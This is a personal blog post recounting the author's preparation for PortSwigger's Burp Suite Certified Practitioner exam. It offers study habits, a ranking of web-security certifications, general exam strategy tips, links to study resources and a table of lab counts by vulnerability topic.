1. To share my personal journey through the Burp Suite Practitioner Certification, offering insights into the challenges and victories I encountered along the way.
2. To provide valuable resources and tips that were instrumental in my certification journey, aiding others in their quest to pass the exam on their first attempt.
3. To inspire and encourage fellow cybersecurity enthusiasts to embark on their certification journeys, highlighting the value of accessible labs and the wealth of resources available from trusted authorities in the field.

If you’re already well-prepared, completed the labs, and are seeking last-minute exam tips, feel free to skip ahead.

Unwrapping the Burp Suite Practitioner Certification

The Burp Suite Certified Practitioner (BSCP) certification, presented by PortSwigger, the creators of Burp Suite, marks a significant milestone in one’s web security career. It demonstrates the ability to identify vulnerabilities, bypass defense mechanisms, and exploit them using Burp Suite. While some lab material delves into extreme depth, PortSwigger’s well-structured learning path and excellent course materials make most topics accessible and engaging. A detailed lab breakdown can be found in the appendix here.

Investing Wisely: Navigating the Cost of Certification

The BSCP certification costs just $99, which may surprise some. This affordability challenges our expectations, especially in a world accustomed to $1,500 courses and expiring lab subscriptions. It’s a psychological shift, and while it might seem cheap, remember that you’ll also need a Burp Pro license, mandatory for the exam. Currently priced at $449.

Juggling Parenthood and Certification Preparation

The path to certification requires unwavering consistency and willpower. I personally stopped and started my journey multiple times over two years. Acknowledging my lackluster focus, I decided to reset my lab progress in July and start from scratch. As of October 26, 2023, I’ve solved over 200 labs, covering Apprentice and Practitioner levels. The difference this time? I took notes diligently. A valuable lesson: embrace discipline and take notes alongside your hacking journey.

Cracking the Books: A Deep Dive into the Study Process

I embarked on my journey using Obsidian and Burp, with the ambitious goal of completing an entire topic per day (26 in total). My commitment was to ensure that I never went a day without at least completing some labs or reading material. The key to my success was not overlooking foundational topics. I’ve learned that reinforcing the basics keeps me receptive and offers fresh perspectives.

Decoding the Essentials: A Closer Look at Course Topics

Portswigger’s materials stands at the top tier when it comes to web application vulnerability resources. It’s free, which is a game-changer. No more scouring the internet and deploying vulnerable apps with no guidance. The labs are a gift, especially if you’ve experienced the frustration of unresolved vulnerabilities and endless PHP exceptions. While some topics may be challenging at first, the satisfaction of grasping something new is unmatched.

Navigating Your Web Application Security Certification Choices

When it comes to web application security certifications, choosing the right path can be a daunting task. The decision should be based on your existing knowledge, career goals, and the level of expertise you wish to achieve. Remember, there’s no one-size-fits-all choice in this journey.

OSWA (Offensive Security Web Application):

• OSWA claims the top spot due to its foundational and accessible nature, making it an ideal starting point for beginners. This certification provides an essential understanding of web application security, laying a solid groundwork for more advanced certifications. It’s perfect for those new to the field and seeking to build a strong knowledge base.

BSCP (Burp Suite Certified Practitioner):

• BSCP earns the second place in the ranking for its specific focus on Burp Suite, the most popular web vulnerability scanner and security tool. This certification is valuable for individuals looking to master Burp Suite and enhance their web security assessment skills. It’s a practical choice for those who wish to specialize in this tool and its applications.

eWPTX (eLearnSecurity Web Application Penetration Tester eXtreme):

• eWPTX secures the third position, offering a comprehensive and in-depth exploration of web application penetration testing. It’s an excellent choice for web security professionals looking to elevate their expertise and gain advanced skills in this domain. eWPTX provides hands-on experience and practical scenarios, making it a valuable certification for those aiming to take their career to the next level.

OSWE (Offensive Security Web Expert):

• OSWE occupies the fourth rank, signifying its advanced and specialized focus on web application security. This certification is tailored for professionals seeking mastery in advanced web security assessment techniques and defense mechanisms. It’s ideal for those who have already built a strong foundation in web application security and are prepared for the challenges of in-depth expertise in the field.

The Path to Success: Navigating the Exam Journey

To register for the exam, you must complete at least one Practitioner-level lab from each topic, five mystery labs, and one practice exam. Mystery labs challenge you to identify vulnerabilities without explicit objectives. During the exam, you’ll need to compromise two applications within a four-hour window, moving from an anonymous user to an administrative user, and eventually gaining Remote Code Execution (RCE) to retrieve a secret file. The logistics are straightforward, but be prepared to start the exam from a Windows machine, even though you can complete it on your Kali box. You can read the official instructions here.

Acing the Exam: Strategies for Passing on Your First Attempt

First and foremost, dismiss the notion that you have to fail on your first try. The sentiment of preparing to fail on the first attempt is pervasive but not necessary.

Understanding Exam Dynamics:

• Mastery of the exam dynamics is crucial, as it involves understanding the rules for completing each application, guiding you through discrete steps.
• This knowledge is a significant advantage, allowing you to isolate specific topics for different phases of the exam.
• For instance, you’re unlikely to encounter SQL injection or command injection when attempting to gain initial access; instead, client-side attacks to access a user’s session are more common.
• Credit to @botesjuan who I believe is the original creator of the commonly shared image below
  

Master Client-Side Delivery With The Exploit Server:

• The effective use of the exploit server is paramount to your success. Even if your highly experienced, the bare minimum requirements for the exam often lead to failure.
• Relying solely on one Practitioner lab per topic doesn’t adequately prepare you for the exam’s mechanics.

Weaponize Your Client-Side Payloads

• Avoid regarding your alert as the ultimate solution in the labs; it’s insufficient in the exam. Instead, understand in each instance how you can exfiltrate cookies through your collaborator or  exploit server.
• In many labs, you’ll achieve this using an iFrame, but be prepared for unexpected challenges. For example, some vulnerable pages may have X-Frame options that block iFrames.

Complete All Practitioner Labs:

• Completing all Practitioner-level labs is essential, primarily for the sake of familiarity. The exam follows a similar structure to the labs, making your experience invaluable.
• With enough practice, you’ll develop an intuitive sense and a mental checklist of potential vulnerabilities to look for.

Utilize Common Obfuscation and Encoding Techniques:

• While labs may not require you to bypass web application firewalls (WAFs), the exam certainly does. Don’t underestimate the importance of obfuscation and encoding techniques.
• Falling short in this area during the exam can lead to pitfalls, so be well-prepared.

Compile Proof-of-Concept (POC) Code:

• It’s a recipe for disaster to rely solely on grabbing solutions from the lab materials during the exam, especially when you have only 40 minutes per vulnerability.
• Ensure you have POC code readily available for each potential vulnerability you may encounter.

Perform Targeted Scanning, Don’t Rely On It

• While targeted scanning is a valuable skill, it’s unwise to solely depend on it to solve the exam. The ability to actively scan the webroot and resolve the exam isn’t guaranteed.
• Consider learning targeted scanning as an additional tool in your toolkit; it may prove useful in certain scenarios.

Value PortSwigger’s Hints:

• Don’t overlook the hints provided by PortSwigger themselves. These hints can provide critical guidance and insights, potentially making your exam experience smoother and more successful.

Rich Resources: Your Ultimate Toolkit

A big shout-out to the authors of the following content, which proved immensely valuable during my journey. If you aim to pass the exam on your first attempt, bookmark these resources and know them inside and out.

Unlocking Wisdom: Blogs for your Journey

1. https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
2. https://github.com/DingyShark/BurpSuiteCertifiedPractitioner
3. https://github.com/Zoltan3422/portswigger-guide
4. https://micahvandeusen.com/burp-suite-certified-practitioner-exam-review/
5. https://bscpcheatsheet.gitbook.io/exam/
6. https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/
7. https://sc.scomurr.com/http-request-smuggling-web-cache-poisoning/

YouTube Guides: Navigating the World of Burp Suite

1. https://www.youtube.com/@RanaKhalil101/videos
2. https://www.youtube.com/@intigriti/videos
3. https://www.youtube.com/watch?v=yC0F05oggTE
4. https://www.youtube.com/@z3nsh3ll

Burp Plugin Power: Enhancing Your Toolkit:

1. DOM Invader
2. Param Miner
3. Hackvector
4. Deserialization Scanner
5. HTTP Request Smuggler

The Final Verdict on the Burp Suite Practitioner Certification

Through this incredible journey, I’ve ventured into unfamiliar territories while strengthening my knowledge in familiar ones. The accessible labs have proven invaluable, offering a wealth of resources to all, even those who might not be interested in certification.

I want to underscore that if I can persevere through this certification journey with a newborn by my side, anyone with the motivation, focus, and determination can do it too. This certification offers a path to expertise in web security, a field where knowledge is power. So, dive in, make use of the resources I’ve shared, and indulge in your favorite topics. The journey is challenging, but the destination is worth every effort. Until next time, stay inspired and stay secure.

Appendix

My Favorite Topics

• Prototype Pollution
• HTTP Request Smuggling
• Race Conditions

Lab Breakdown

Topic	Total Apprentice Labs	Total Practitioner Labs	Total Expert Labs
SQLi	2	16	0
XSS	9	15	6
CSRF	1	11	0
Clickjacking	3	2	0
DOM-Based	0	5	2
CORS	2	1	1
XXE	2	5	1
SSRF	2	3	2
Request Smuggling	0	15	7
Command Injection	1	4	0
SSTI	0	5	2
Path Traversal	1	5	0
Access Control	9	4	0
Authentication	3	9	2
WebSockets	1	2	0
Cache Poisoning	0	9	4
Deserialization	1	5	3
Info Disclosure	4	1	0
Business Logic	4	7	0
Host Header	2	4	1
OAuth	1	4	1
File Upload	2	4	1
JWT	2	4	2
Prototype Pollution	0	9	1
GraphQL	1	4	0
Race Conditions	1	4	1
NoSQL	2	2	0

The post Mastering Burp Suite: A Journey to Certification and Beyond appeared first on Certification Chronicles.